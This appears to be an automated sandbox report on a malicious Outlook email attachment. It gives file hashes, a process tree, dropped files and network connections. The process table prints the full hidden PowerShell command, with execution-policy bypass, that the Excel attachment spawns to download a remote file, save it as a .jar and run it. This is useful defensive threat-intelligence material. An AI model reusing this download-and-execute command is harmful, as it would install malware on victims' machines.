Field | Value
---|---
File name | FW Selamlar ACIL KONTROL EDIN ÖZKAN VİRÜS BU SANIRIM DEĞİLMİ.msg
Full analysis | https://app.any.run/tasks/fb38d126-699c-479e-9ff0-4f42482c82f9
Verdict | Malicious activity
Analysis date | September 19, 2019, 07:10:13
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | application/vnd.ms-outlook
File info | CDFV2 Microsoft Outlook Message
MD5 | FFA129F43EEC805C72FB10E7618F8B29
SHA1 | A2CFF9F06E38A06B843538EF84578B686A198E15
SHA256 | DFDF2509BD59A5D2FFEA177495AC6DCB187429E8C30FCA3EAA8BE8DD3827D49A
SSDEEP | 1536:mK/BIezBNTqQw4CLUXOb77DTCFYKKKTsHUhSS:jzBNTqrz7N
Extension | File type | Match (%)
---|---|---
.msg | Outlook Message | 58.9
.oft | Outlook Form Template | 34.4
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3376 | `"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW Selamlar ACIL KONTROL EDIN ÖZKAN VİRÜS BU SANIRIM DEĞİLMİ.msg"` | `C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE` | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000
1008 | `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde` | `C:\Program Files\Microsoft Office\Office14\EXCEL.EXE` | — | OUTLOOK.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000
4092 | `CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/881557/0gxfzyh8/gh-pages/ku9b5dv.rtf\" ,\" %tmp%\\FC6QMo.jar\") }" & %tmp%\\FC6QMo.jar` | `C:\Windows\system32\CMD.EXE` | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2664 | `powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/881557/0gxfzyh8/gh-pages/ku9b5dv.rtf\" ,\" C:\Users\admin\AppData\Local\Temp\\FC6QMo.jar\") }"` | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | — | CMD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2628 | `"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\FC6QMo.jar"` | `C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe` | — | CMD.EXE | User: admin; Company: Oracle Corporation; Integrity Level: MEDIUM; Description: Java(TM) Platform SE binary; Exit code: 0; Version: 8.0.920.14
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Temp\CVR99A5.tmp.cvr` | — | — | —
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm` | pgc | E6D4B8517915FB75618D4BF2FF48832B | EEEAC57A30E224A159E95087CAD97F6015F560FEE476732282A030CBE13F26FA
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B35A7114.dat` | image | 3D5F732E72E96EF1EC2F3877C172397E | D63218A5F04FE3924E83EE3B190FE8D1365FB6B04170FEDC7635C30F61F9B006
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6AF7CAE.dat` | image | 69B7FC9EFFA301E4238337F80F7B1943 | 3D46E040A7D64A865A19737100650A468E02CDC78B15124AC1924C90A1A14AD0
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F51E5A0.dat` | image | E9464B730CF4BDA59247CD2E56E68674 | FA00F7E2C5B6EA2EA94FCEB4AC5612E4C8E8A8BCF5B7678CB005C78386BCB044
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5466921.dat` | image | 042E14E4A284A80B78B8F68AF8D6D3DA | A6356D3B84C18564420FDFCAEDAEF643B31F0EF2FCDF7951E8A2C474A56DB749
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6178B9F.dat` | image | BD9EF18DB6EF932C03E93A6DA9CD4CE7 | 490ACF9B24FAD678AB25498745243E536C85D76046C9709757DFA0BF3546439F
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AC77013.dat` | image | AFA321D373174B22DC32F28BCCA9764C | B79993E55C9811CF5550F0B4765DC439EF91A4417E747D7F0B25BDAC460BE51E
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JD9DBPGY\Belge_8 (2).xls:Zone.Identifier:$DATA` | — | — | —
3376 | OUTLOOK.EXE | `C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92D13CEC.dat` | image | B07BEE671DC501FFDD2A7A92C4C12EEB | 70AFAFB0193E9425AA23313B43FE1C1C7D54BF4E9D74FD1243D4073203FDC750
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3376 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2664 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |
3376 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation
---|---|---
config.messenger.msn.com | — | whitelisted
raw.githubusercontent.com | — | shared